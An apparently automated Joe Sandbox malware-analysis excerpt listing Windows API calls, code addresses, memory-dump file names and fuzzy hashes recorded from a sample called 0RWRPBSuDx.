                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 1799206407-0
                                                                          • Opcode ID: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                          • Instruction ID: d7471e736b24b3bb5787cc7ba159720b7e0b567afb63d73ad787c716b5a8a183
                                                                          • Opcode Fuzzy Hash: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                          • Instruction Fuzzy Hash: 80F0C871A04748ABCB10DFA59C4199EB3E8DB4A72676047B7FC14E3692E6385E048598
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 004231E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                          • Instruction ID: 4f47f79916221551be92d6970dee20b840cac536ee7260014ee3ac6489712308
                                                                          • Opcode Fuzzy Hash: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                          • Instruction Fuzzy Hash: C9F0A7117001145BD6205D3E6CC1D3A72688F87736B61033BFE2AD72D1C62E2D51426D
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                          • Instruction ID: 2bd629673230950b16c4bb4544665cc4d3578012b9e0763c9fae70ecea85f9d4
                                                                          • Opcode Fuzzy Hash: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                          • Instruction Fuzzy Hash: 31F08270714744FEDF019F779C6282BBBECE74DB1479249B6F800A2691E63C5810C939
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDE6
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDEE
                                                                            • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                          • Instruction ID: 60b10378e44b0f0defca91e9e4490efccb0b8310a6ae63c26c4d70013a2aa3fa
                                                                          • Opcode Fuzzy Hash: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                          • Instruction Fuzzy Hash: FEE012F53056016BFB10EA7599C1F3B22D8DB48314F10447AB545CF186D674DC098B35
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Alloc
                                                                          • String ID:
                                                                          • API String ID: 2558781224-0
                                                                          • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                          • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                          • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                          • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                          Uniqueness
                                                                          • Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                          • Instruction ID: 19192df4380cdbc1205a3ed9b24420002ad268da67895c40ec756cea1f38d7a4
                                                                          • Opcode Fuzzy Hash: 1bcf32e1270a55b637581478727a2e9913153c6ccf7aad1aa7fae9fef5c4f448
                                                                          • Instruction Fuzzy Hash: 1EF0A772B0073067EB60596A4C81F5359C49FC5798F154076FD0DFF3E9D6B58C0142A9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendNotifyMessageA.USER32(00020420,00000496,00002711,00000000), ref: 00478C14
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: MessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 3556456075-0
                                                                          • Opcode ID: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                          • Instruction ID: e9f93c3131ab9aed4d7988b9751f139f8c14b39f52ecba7056dfc34498fb85c2
                                                                          • Opcode Fuzzy Hash: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                          • Instruction Fuzzy Hash: 0441A6746010008BC701FF66EC85A8B7BA5AB94309B65C57BB4049F3A7CA3CED478B5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                          • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                          • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                          • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                            • Part of subcall function 0041EE14: 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046800E,?,00000000,?,?,0046821B,?,00000000,0046825A), ref: 00467FF2
                                                                            • Part of subcall function 0041EEC8: IsWindow.USER32(?), ref: 0041EED6
                                                                            • Part of subcall function 0041EEC8: EnableWindow.USER32(?,00000001), ref: 0041EEE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 390483697-0
                                                                          • Opcode ID: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                          • Instruction ID: 14fc102064ef3ab447e4390d65f6ef6ce5acf5f288e443c002039df4b727e1a7
                                                                          • Opcode Fuzzy Hash: 1916fb52c999032ee8c755ca1a905755ac568ed81d39199cf5bb64b11a61d8f2
                                                                          • Instruction Fuzzy Hash: 1AF0E975208300BFE7059FB2EC16B1677E8E349725F62087FF404971D0EA795844D51D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: 8982111d837b22a654d5e287c7045eba67879d0a6afc285262999d3c1c57c6fe
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 51F06234105109DF9F2CCF58D0E59AF7761EB45700B2085AFE60787350CA34AD20DA59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 004164F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                          • Instruction ID: 34aaedb761569f87127437b87f660ad39376ae005fde3180b2cf9fb4127eef57
                                                                          • Opcode Fuzzy Hash: 2af4b48136c97ef475e2d548a532a987733a71f7bd8abfe4e609d79a0b30ebbf
                                                                          • Instruction Fuzzy Hash: A7F013B2200510AFDB94CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD220EC108BB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0041495F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CBF0,?,00000001,?,?,00000000,?,0042CC42,00000000,004513A9,00000000,004513CA,?,00000000), ref: 0042CBD3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                          • Instruction ID: dfed850972a7f4cfed0b3d6ce6ead54829112a593105f6481b619d55be1254e6
                                                                          • Opcode Fuzzy Hash: fb728ae1967c572744be537d183b1c2397660519459ab9e6793d4da77068addf
                                                                          • Instruction Fuzzy Hash: 1AE06571304708BFD701EB62AC93E5EBBACD745714B914876B400A7651D5B8AE00845C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FCDC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                          • Instruction ID: 6c681f427aec3a456f64e3edeb529b69c7e2eff4e0c15a83e21b0084e331bb23
                                                                          • Opcode Fuzzy Hash: 4695a6fd859b23d6e05288b159f4db2c373673df207a75ef7933aba3ac402c35
                                                                          • Instruction Fuzzy Hash: BCE012A53541483ED340EEAD6C42FA777DC971A755F008033B998D7341D9A19E158BA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451BF7,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                          • Instruction ID: 7c82c80d86496392c3130c3e7de8882f0dfcc9e316fc406f93a4df2216b263d5
                                                                          • Opcode Fuzzy Hash: 860b655ccada46b5013a8742cf2038536e52ba062f8b3e277fa769ce81e13b95
                                                                          • Instruction Fuzzy Hash: 21E026617843112AF23514567C83B7F1A4E83C0B04FE4842B7B00DE3C3DAAEAD09429E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,004235EC,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 00406329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                          • Instruction ID: 5aa87c08ff8936fcaaa84cf50ff31e6a06e3de0a8084b04fc6442f63f77fe161
                                                                          • Opcode Fuzzy Hash: 4676b834bccda8ccd94f8a4f379db04665fbdc7bc7b85aab9c145464b6c6dbba
                                                                          • Instruction Fuzzy Hash: BDE07EB2600129AF9B40DE8DDC81EEB37ADAB1D350F404016FA08D7200C2B4EC519BB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0046C394,00000000,0046D18D,?,00000000,0046D1D6,?,00000000,0046D30F,?,00000000,?,00000000), ref: 0045344E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                          • Instruction ID: f2f8a632f0a2160e68271c263a111a4b86933883cadac8f3c7310e18fb689ea2
                                                                          • Opcode Fuzzy Hash: 427228486256767e00faf75f55361d34339d0a4a5d8c678e4eed14c482ba6ac9
                                                                          • Instruction Fuzzy Hash: A3E065B05046008BDB15DF3A848025676D15F89321F14C56AAC58CB3A6D63C840A8A56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(0048F91E,?,0048F940,?,?,00000000,0048F91E,?,?), ref: 0041460B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406E8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                          • Instruction ID: 5e9ef0cb41ef517b54198f539e7e4457f1ce254f1207c5e451c0fee893fabf4d
                                                                          • Opcode Fuzzy Hash: f93223040538cb60598dc4cf3010d2a684b40fa1b5059103e17c9242f0e749d0
                                                                          • Instruction Fuzzy Hash: 3DD05B763082107AD620A55BAC44DA76BDCCFC5770F11063EB558C71C1D6309C01C675
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00423568: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042357D
                                                                          • ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            • Part of subcall function 00423598: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
